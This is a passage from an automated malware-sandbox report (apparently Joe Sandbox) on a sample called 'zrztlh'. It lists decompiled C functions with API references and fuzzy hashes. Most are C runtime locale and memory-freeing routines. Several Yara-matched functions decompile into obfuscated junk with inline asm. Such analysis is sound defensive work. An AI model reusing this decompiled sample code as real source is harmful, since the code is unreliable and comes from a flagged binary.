                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8A4F
                • ___getlocaleinfo.LIBCMT ref: 00EB8A66
                • ___getlocaleinfo.LIBCMT ref: 00EB8A80
                • ___free_lconv_num.LIBCMT ref: 00EB8A8F
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB8918
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB892A
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB893C
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB894E
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB8960
                • _free.LIBCMT ref: 00EB8A9C
                • _free.LIBCMT ref: 00EB8AA5
                • _free.LIBCMT ref: 00EB8B01
                • _free.LIBCMT ref: 00EB8B0C
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast___free_lconv_num__invoke_watson__malloc_crt_malloc
                • String ID:
                • API String ID: 3887541295-0
                • Opcode ID: 82b4644ae07c0169578ac2e24c51b9e489d15f234c44375145e1d30360a2be34
                • Instruction ID: 11caa2f6fd1e5339cd4bb9ab9288a885e28c1434a6e26600e77db89d58b9ee1e
                • Opcode Fuzzy Hash: 82b4644ae07c0169578ac2e24c51b9e489d15f234c44375145e1d30360a2be34
                • Instruction Fuzzy Hash: 822153B6940209BAEB20DBA4CC46FEFBBEC9B44750F145115FA04FA2D1DA70DA40CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EBE8C3(short _a4, intOrPtr _a8) {
                				short _t13;
                				short _t28;
                
                				_t28 = _a4;
                				if(_t28 != 0 &&  *_t28 != 0 && E00EBDB28(_t28, ?str?) != 0) {
                					if(E00EBDB28(_t28, ?str?) != 0) {
                						return E00EBEFC5(_t28);
                					}
                					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                						L9:
                						return 0;
                					}
                					return _a4;
                				}
                				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                					goto L9;
                				}
                				_t13 = _a4;
                				if(_t13 == 0) {
                					return GetACP();
                				}
                				return _t13;
                			}





                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE907
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE931
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction ID: bbd92ebf05956c3359fd9bc9f353d70a772304c51c54fc90144992672bc5ae30
                • Opcode Fuzzy Hash: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction Fuzzy Hash: D301B532208205BAEB509F15DC46FEB37DC9F44768F0054A5F909FA291E731EE85C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E0040E454(void* __eax, void* __ebx, char __edx, void* __esi, void* __eflags, void* __fp0) {
                				void* _t34;
                				intOrPtr _t36;
                				void* _t64;
                				signed int _t73;
                				void* _t74;
                				void* _t84;
                
                				_t34 = __eax;
                				_push(es);
                				asm("sbb al, 0x58");
                				_push(0xa506a485);
                				if(__eflags != 0) {
                					L5:
                					return _t34;
                				} else {
                					_t84 =  *((intOrPtr*)(__esi + 0x73)) - __ebx;
                					_pop(_t70);
                					if(_t84 >= 0) {
                						asm("in al, dx");
                						_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 0xc)) + 8));
                						_t64 = 0;
                						__eflags = _t36 - 8;
                						if(_t36 != 8) {
                							__eflags = _t36 - 0xd;
                							if(_t36 != 0xd) {
                								__eflags = _t36 - 9;
                								if(_t36 != 9) {
                									__eflags = _t36 - 0x1b;
                									if(_t36 != 0x1b) {
                										__eflags = _t36 - 0x12;
                										if(_t36 != 0x12) {
                											__eflags = _t36 + 0xffffff90 - 0x17;
                											if(_t36 + 0xffffff90 > 0x17) {
                												goto L10;
                											} else {
                												return 1;
                											}
                										} else {
                											_t73 =  *((intOrPtr*)(_t74 + 8));
                											E0041BDB0(_t73 + 0x113e0, _t73 + 0x12078, 0xc);
                											 *(_t73 + 0x112b8) = 5;
                											goto L9;
                										}
                									} else {
                										_t73 =  *((intOrPtr*)(_t74 + 8));
                										E0041BDB0(_t73 + 0x113e0, _t73 + 0x12060, 0xc);
                										 *(_t73 + 0x112b8) = 5;
                										goto L9;
                									}
                								} else {
                									_t73 =  *((intOrPtr*)(_t74 + 8));
                									E0041BDB0(_t73 + 0x113e0, _t73 + 0x12090, 0xc);
                									 *(_t73 + 0x112b8) = 5;
                									goto L9;
                								}
                							} else {
                								_t73 =  *((intOrPtr*)(_t74 + 8));
                								_push(0x10);
                								_push(_t73 + 0x120a8);
                								_push(_t73 + 0x113e0);
                								goto L8;
                							}
                						} else {
                							_t73 =  *((intOrPtr*)(_t74 + 8));
                							_push(0x10);
                							_push(_t73 + 0x120c0);
                							_push(_t73 + 0x113e0);
                							L8:
                							E0041BDB0();
                							 *(_t73 + 0x112b8) = 7;
                							L9:
                							_t64 = 1;
                							E0041BDB0(_t73 + 0x113e0 +  *(_t73 + 0x112b8) * 2, _t73 + 0x112d8, 4);
                							_t17 = _t73 + 0x112b8;
                							 *_t17 =  *(_t73 + 0x112b8) + 2;
                							__eflags =  *_t17;
                							E0040DE70(_t73, 2);
                							L10:
                							return _t64;
                						}
                					} else {
                						asm("aaa");
                						_push(cs);
                						asm("cdq");
                						 *((char*)(__eax - 0x6f)) = __edx;
                						_push(0xf8b71909);
                						goto 0xe3f7;
                						asm("cmpsd");
                						asm("cmpsb");
                						goto L5;
                					}
                				}
                			}









                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0aa2d2a0d50eeb7ad0d81364a6ebbf11094aebd8940885d66045e382b4182d9f
                • Instruction ID: 8156391e62aa7a67c88d3b19a6d33367a88bdcb5fd30e7aa248455c16bac01a2
                • Opcode Fuzzy Hash: 0aa2d2a0d50eeb7ad0d81364a6ebbf11094aebd8940885d66045e382b4182d9f
                • Instruction Fuzzy Hash: 3BD02B31A46615C9C2211D59BD044FEF77CDAD3222F181DBFDBD9631118230C047865B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00417D7E(signed int __eax, void* __ebx, void* __edi) {
                				void* _t12;
                
                				asm("in al, 0x80");
                				 *((intOrPtr*)(_t12 - 0x2a)) =  *((intOrPtr*)(_t12 - 0x2a)) - __ebx;
                				 *((intOrPtr*)(__edi - 0x1295096)) =  *((intOrPtr*)(__edi - 0x1295096)) - _t12;
                				return __eax & 0xbbea5bfd;
                			}




                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75102d1129a281efdef18defaaae80107a2ca018b51d7b82ddf8910475f852d3
                • Instruction ID: e4025118671ec2202aa14b87c42a559416c62acf3e4200dbe05eca2f0dfd4566
                • Opcode Fuzzy Hash: 75102d1129a281efdef18defaaae80107a2ca018b51d7b82ddf8910475f852d3
                • Instruction Fuzzy Hash: 02C08033F0501C4586104CE5F4020F4F374D547192B04135FC94CB30405113D010465D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E481(void* __eax) {
                
                				return __eax;
                			}



                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a9dd0381e71d8b4deb29e717aa7fe92093c1ad123f34a163d14a788ae9f0aa2
                • Instruction ID: 2125dbffa09ef3ab1ceb430a1d31913b87f5203aed1fd3037384c02c8bde55cb
                • Opcode Fuzzy Hash: 1a9dd0381e71d8b4deb29e717aa7fe92093c1ad123f34a163d14a788ae9f0aa2
                • Instruction Fuzzy Hash: 29A00117F8A1181254285C8E78820B4F378D687076E5032E7DE0CB79402452CC6641EE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00EA4917(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                				void* _t60;
                				void* _t65;
                
                				_t65 = __esi;
                				asm("in eax, dx");
                				asm("sbb al, 0x1");
                				 *((intOrPtr*)(__ecx + 0x11234e3)) =  *((intOrPtr*)(__ecx + 0x11234e3)) + __eax;
                				 *((intOrPtr*)(__ecx + 0x16c96f3)) =  *((intOrPtr*)(__ecx + 0x16c96f3)) + __eax;
                				_t6 = _t65 + 0xf8; // 0x55c35d59
                				E00EB2248( *_t6);
                				_t7 = _t65 + 0xfc; // 0x5768ec8b
                				E00EB2248( *_t7);
                				_t8 = _t65 + 0x100; // 0xff000001
                				E00EB2248( *_t8);
                				_t9 = _t65 + 0x104; // 0x43e80875
                				E00EB2248( *_t9);
                				_t10 = _t65 + 0x108; // 0x59000003
                				E00EB2248( *_t10);
                				_t11 = _t65 + 0x10c; // 0x55c35d59
                				E00EB2248( *_t11);
                				_t12 = _t65 + 0x110; // 0x106aec8b
                				E00EB2248( *_t12);
                				_t13 = _t65 + 0x114; // 0xe80875ff
                				E00EB2248( *_t13);
                				_t14 = _t65 + 0x118; // 0x332
                				E00EB2248( *_t14);
                				_t15 = _t65 + 0x11c; // 0xc35d5959
                				E00EB2248( *_t15);
                				_t16 = _t65 + 0x120; // 0x6aec8b55
                				E00EB2248( *_t16);
                				_t17 = _t65 + 0x124; // 0x875ff08
                				E00EB2248( *_t17);
                				_t18 = _t65 + 0x128; // 0x321e8
                				E00EB2248( *_t18);
                				_t19 = _t65 + 0x12c; // 0x5d595900
                				E00EB2248( *_t19);
                				_t20 = _t65 + 0x130; // 0xec8b55c3
                				E00EB2248( *_t20);
                				_t21 = _t65 + 0x134; // 0x75ff016a
                				E00EB2248( *_t21);
                				_t22 = _t65 + 0x138; // 0x310e808
                				E00EB2248( *_t22);
                				_t23 = _t65 + 0x13c; // 0x59590000
                				E00EB2248( *_t23);
                				_t24 = _t65 + 0x140; // 0x8b55c35d
                				E00EB2248( *_t24);
                				_t25 = _t65 + 0x144; // 0x8068ec
                				E00EB2248( *_t25);
                				_t26 = _t65 + 0x148; // 0x75ff0000
                				E00EB2248( *_t26);
                				_t27 = _t65 + 0x14c; // 0x2fce808
                				E00EB2248( *_t27);
                				_t28 = _t65 + 0x150; // 0x59590000
                				E00EB2248( *_t28);
                				_t29 = _t65 + 0x154; // 0x8b55c35d
                				E00EB2248( *_t29);
                				_t30 = _t65 + 0x158; // 0xff006aec
                				E00EB2248( *_t30);
                				_t31 = _t65 + 0x15c; // 0x8ce80875
                				E00EB2248( *_t31);
                				_t32 = _t65 + 0x160; // 0x59fffffe
                				_t60 = E00EB2248( *_t32);
                				return _t60;
                			}





                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction ID: c76c982d28fe3763c6dea60a184c129c29c08e1021c71fff5aab45d07e48d500
                • Opcode Fuzzy Hash: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction Fuzzy Hash: 50211F71860601DBCB523B30DD036D77BE1AF25305F145E6DF3FEB41729A223965A642
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EB842D(intOrPtr _a4) {
                				intOrPtr _t15;
                				intOrPtr _t54;
                				void* _t56;
                				void* _t57;
                				void* _t58;
                				void* _t59;
                				void* _t60;
                				void* _t61;
                				void* _t62;
                				void* _t63;
                				void* _t64;
                				void* _t65;
                				void* _t66;
                				void* _t67;
                				void* _t68;
                
                				_t54 = _a4;
                				if(_t54 != 0) {
                					_t2 = _t54 + 0xc; // 0xf000000
                					_t56 =  *_t2 -  *0xecee34; // 0xed0054
                					if(_t56 != 0) {
                						E00EB2248(_t16);
                					}
                					_t3 = _t54 + 0x10; // 0x254804b7
                					_t57 =  *_t3 -  *0xecee38; // 0xed0054
                					if(_t57 != 0) {
                						E00EB2248(_t17);
                					}
                					_t4 = _t54 + 0x14; // 0x8000
                					_t58 =  *_t4 -  *0xecee3c; // 0xed0054
                					if(_t58 != 0) {
                						E00EB2248(_t18);
                					}
                					_t5 = _t54 + 0x18; // 0xfc7d80
                					_t59 =  *_t5 -  *0xecee40; // 0xed0054
                					if(_t59 != 0) {
                						E00EB2248(_t19);
                					}
                					_t6 = _t54 + 0x1c; // 0x4d8b0774
                					_t60 =  *_t6 -  *0xecee44; // 0xed0054
                					if(_t60 != 0) {
                						E00EB2248(_t20);
                					}
                					_t7 = _t54 + 0x20; // 0x706183f8
                					_t61 =  *_t7 -  *0xecee48; // 0xed0054
                					if(_t61 != 0) {
                						E00EB2248(_t21);
                					}
                					_t8 = _t54 + 0x24; // 0x5de58bfd
                					_t62 =  *_t8 -  *0xecee4c; // 0xed0054
                					if(_t62 != 0) {
                						E00EB2248(_t22);
                					}
                					_t9 = _t54 + 0x38; // 0x5d595900
                					_t63 =  *_t9 -  *0xecee60; // 0xed0058
                					if(_t63 != 0) {
                						E00EB2248(_t23);
                					}
                					_t10 = _t54 + 0x3c; // 0xec8b55c3
                					_t64 =  *_t10 -  *0xecee64; // 0xed0058
                					if(_t64 != 0) {
                						E00EB2248(_t24);
                					}
                					_t11 = _t54 + 0x40; // 0x10368
                					_t65 =  *_t11 -  *0xecee68; // 0xed0058
                					if(_t65 != 0) {
                						E00EB2248(_t25);
                					}
                					_t12 = _t54 + 0x44; // 0x875ff00
                					_t66 =  *_t12 -  *0xecee6c; // 0xed0058
                					if(_t66 != 0) {
                						E00EB2248(_t26);
                					}
                					_t13 = _t54 + 0x48; // 0x401e8
                					_t67 =  *_t13 -  *0xecee70; // 0xed0058
                					if(_t67 != 0) {
                						E00EB2248(_t27);
                					}
                					_t14 = _t54 + 0x4c; // 0x5d595900
                					_t15 =  *_t14;
                					_t68 = _t15 -  *0xecee74; // 0xed0058
                					if(_t68 != 0) {
                						return E00EB2248(_t15);
                					}
                				}
                				return _t15;
                			}


















                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction ID: d86f6136d34f35263c62f8e6885103ebc235d3aae55e4d4c0ecb822de8d8c90d
                • Opcode Fuzzy Hash: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction Fuzzy Hash: 35214B32940204AFC224EB69EA82C9B33EDAF003543A46D18F255F7771CE35FC848A25
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00EB7973(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				intOrPtr _t15;
                				intOrPtr _t22;
                				intOrPtr* _t42;
                
                				if(_a4 > 5 || _a8 == 0) {
                					L4:
                					return 0;
                				} else {
                					_t42 = E00EB2280(8, 1);
                					if(_t42 != 0) {
                						_t12 = E00EB2280(0xb8, 1);
                						 *_t42 = _t12;
                						__eflags = _t12;
                						if(_t12 != 0) {
                							_t13 = E00EB2280(0x220, 1);
                							 *((intOrPtr*)(_t42 + 4)) = _t13;
                							__eflags = _t13;
                							if(_t13 != 0) {
                								E00EB7488( *_t42, 0xece800);
                								_t15 = E00EB7D73(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                								_push( *((intOrPtr*)(_t42 + 4)));
                								__eflags = _t15;
                								if(__eflags == 0) {
                									L14:
                									E00EB2248();
                									E00EB4248( *_t42);
                									E00EB40EE( *_t42);
                									E00EB2248(_t42);
                									_t42 = 0;
                									L16:
                									return _t42;
                								}
                								_push( *((intOrPtr*)( *_t42 + 4)));
                								_t22 = E00EB48E9(__edx, 1, __eflags);
                								__eflags = _t22;
                								if(_t22 == 0) {
                									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                									goto L16;
                								}
                								_push( *((intOrPtr*)(_t42 + 4)));
                								goto L14;
                							}
                							E00EB2248( *_t42);
                							E00EB2248(_t42);
                							L8:
                							goto L3;
                						}
                						E00EB2248(_t42);
                						goto L8;
                					}
                					L3:
                					 *((intOrPtr*)(E00EAF100())) = 0xc;
                					goto L4;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction ID: 82d4e0dbc25873a375edb683a063a90e7f3d2b736cacafff5ce311300eef1a2b
                • Opcode Fuzzy Hash: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction Fuzzy Hash: 7321F63554D601EAEB263F64DC02EDB7BD4DFC1750B21642DF6C4B58B2EA3199009691
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00EA5135(void* __eax, void* __ebx) {
                				intOrPtr _t5;
                				intOrPtr _t6;
                				intOrPtr _t7;
                				intOrPtr _t8;
                				void* _t13;
                				void* _t23;
                				void* _t24;
                				void* _t26;
                				intOrPtr* _t27;
                				signed int _t28;
                				signed int _t29;
                
                				_t13 = __ebx;
                				asm("adc eax, 0xec70fc");
                				asm("int3");
                				__imp__DecodePointer( *0xed0110, _t23, _t26);
                				_t27 =  *0xecf20c; // 0x0
                				_t24 = __eax;
                				if(_t27 != 0) {
                					while( *_t27 != 0) {
                						E00EB2248( *_t27);
                						_t27 = _t27 + 4;
                						if(_t27 != 0) {
                							continue;
                						}
                						break;
                					}
                					_t27 =  *0xecf20c; // 0x0
                				}
                				_push(_t13);
                				E00EB2248(_t27);
                				_t28 =  *0xecf208; // 0x0
                				 *0xecf20c = 0;
                				if(_t28 != 0) {
                					while( *_t28 != 0) {
                						E00EB2248( *_t28);
                						_t28 = _t28 + 4;
                						if(_t28 != 0) {
                							continue;
                						}
                						break;
                					}
                					_t28 =  *0xecf208; // 0x0
                				}
                				E00EB2248(_t28);
                				 *0xecf208 = 0;
                				E00EB2248( *0xecf204);
                				_t5 = E00EB2248( *0xecf200);
                				_t29 = _t28 | 0xffffffff;
                				 *0xecf204 = 0;
                				 *0xecf200 = 0;
                				if(_t24 != _t29 &&  *0xed0110 != 0) {
                					_t5 = E00EB2248(_t24);
                				}
                				__imp__EncodePointer(_t29);
                				 *0xed0110 = _t5;
                				_t6 =  *0xecfd10; // 0x0
                				if(_t6 != 0) {
                					E00EB2248(_t6);
                					 *0xecfd10 = 0;
                				}
                				_t7 =  *0xecfd14; // 0x0
                				if(_t7 != 0) {
                					E00EB2248(_t7);
                					 *0xecfd14 = 0;
                				}
                				_t8 =  *0xececec; // 0xeceac8
                				asm("lock xadd [eax], esi");
                				if(_t29 == 1) {
                					_t8 =  *0xececec; // 0xeceac8
                					if(_t8 != 0xeceac8) {
                						_t8 = E00EB2248(_t8);
                						 *0xececec = 0xeceac8;
                					}
                				}
                				return _t8;
                			}

                APIs
                • DecodePointer.KERNEL32 ref: 00EB091B
                • _free.LIBCMT ref: 00EB0934
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB0947
                • _free.LIBCMT ref: 00EB0965
                • _free.LIBCMT ref: 00EB0977
                • _free.LIBCMT ref: 00EB0988
                • _free.LIBCMT ref: 00EB0993
                • _free.LIBCMT ref: 00EB09B7
                • EncodePointer.KERNEL32(00000000), ref: 00EB09BE
                • _free.LIBCMT ref: 00EB09D3
                • _free.LIBCMT ref: 00EB09E9
                • _free.LIBCMT ref: 00EB0A11
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction ID: 40097ca679f4d53ba173fe52876249510fa17ec11c5482e72e5d38763d3a9635
                • Opcode Fuzzy Hash: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction Fuzzy Hash: C0218F76D012118FD7259F16BC41E8B77A5FB817203141A3EFA34B3271CB366C468B81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00EB7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                				signed int _v8;
                				signed int _v32;
                				intOrPtr _v36;
                				signed int _v40;
                				void* _t38;
                				signed int _t43;
                				signed int _t45;
                				signed int _t60;
                				void* _t68;
                				void* _t71;
                				intOrPtr _t77;
                				void* _t79;
                				intOrPtr* _t81;
                				signed int _t82;
                				signed int _t85;
                				intOrPtr _t87;
                				void* _t91;
                
                				_t79 = __edx;
                				_push(__ebx);
                				_push(__esi);
                				_t85 = 0;
                				if(_a12 <= 0) {
                					L5:
                					return _t38;
                				} else {
                					_push(__edi);
                					_t81 =  &_a12;
                					while(1) {
                						_t81 = _t81 + 4;
                						_t38 = E00EB56BB(_a4, _a8,  *_t81);
                						_t91 = _t91 + 0xc;
                						if(_t38 != 0) {
                							break;
                						}
                						_t85 = _t85 + 1;
                						if(_t85 < _a12) {
                							continue;
                						} else {
                							goto L5;
                						}
                						goto L20;
                					}
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					E00EAEB49(0, _t79);
                					asm("int3");
                					_push(0x14);
                					_push(0xecc560);
                					E00EAF1E0(0, _t81, _t85);
                					_t66 = 0;
                					_v32 = 0;
                					__eflags = _a4 - 5;
                					if(_a4 <= 5) {
                						_t87 = E00EB0595();
                						_v36 = _t87;
                						E00EB42E8(0, _t79, _t81, _t87, __eflags);
                						 *(_t87 + 0x70) =  *(_t87 + 0x70) | 0x00000010;
                						_v8 = _v8 & 0;
                						_t43 = E00EB2280(0xb8, 1);
                						_pop(_t68);
                						_t82 = _t43;
                						_v40 = _t82;
                						__eflags = _t82;
                						if(_t82 != 0) {
                							E00EB20A9(_t68, 0xc);
                							_v8 = 1;
                							E00EB7488(_t82,  *((intOrPtr*)(_t87 + 0x6c)));
                							_pop(_t71);
                							_v8 = _v8 & 0x00000000;
                							E00EB7BBF();
                							_t66 = E00EB7D73(0, _t79, _t82, _t87, _t82, _a4, _a8);
                							_v32 = _t66;
                							__eflags = _t66;
                							if(_t66 == 0) {
                								E00EB4248(_t82);
                								_t43 = E00EB40EE(_t82);
                							} else {
                								__eflags = _a8;
                								if(_a8 != 0) {
                									_t60 = E00EBDB28(_a8, 0xece694);
                									_pop(_t71);
                									__eflags = _t60;
                									if(_t60 != 0) {
                										 *0xed0050 = 1;
                									}
                								}
                								E00EB20A9(_t71, 0xc);
                								_v8 = 2;
                								_t25 = _t87 + 0x6c; // 0x6c
                								E00EB4368(_t25, _t82);
                								E00EB4248(_t82);
                								__eflags =  *(_t87 + 0x70) & 0x00000002;
                								if(( *(_t87 + 0x70) & 0x00000002) == 0) {
                									__eflags =  *0xecee10 & 0x00000001;
                									if(( *0xecee10 & 0x00000001) == 0) {
                										E00EB4368(0xece7fc,  *((intOrPtr*)(_t87 + 0x6c)));
                										_t77 =  *0xece7fc; // 0xece800
                										_t32 = _t77 + 0x84; // 0xecee28
                										 *0xecee20 =  *_t32;
                										_t33 = _t77 + 0x90; // 0xec8760
                										 *0xecee7c =  *_t33;
                										_t34 = _t77 + 0x74; // 0x1
                										 *0xece690 =  *_t34;
                									}
                								}
                								_v8 = _v8 & 0x00000000;
                								_t43 = E00EB7BCE();
                							}
                						}
                						_v8 = 0xfffffffe;
                						E00EB7C01(_t43, _t87);
                						_t45 = _t66;
                					} else {
                						 *((intOrPtr*)(E00EAF100())) = 0x16;
                						E00EAEB1E();
                						_t45 = 0;
                					}
                					return E00EAF225(_t45);
                				}
                				L20:
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
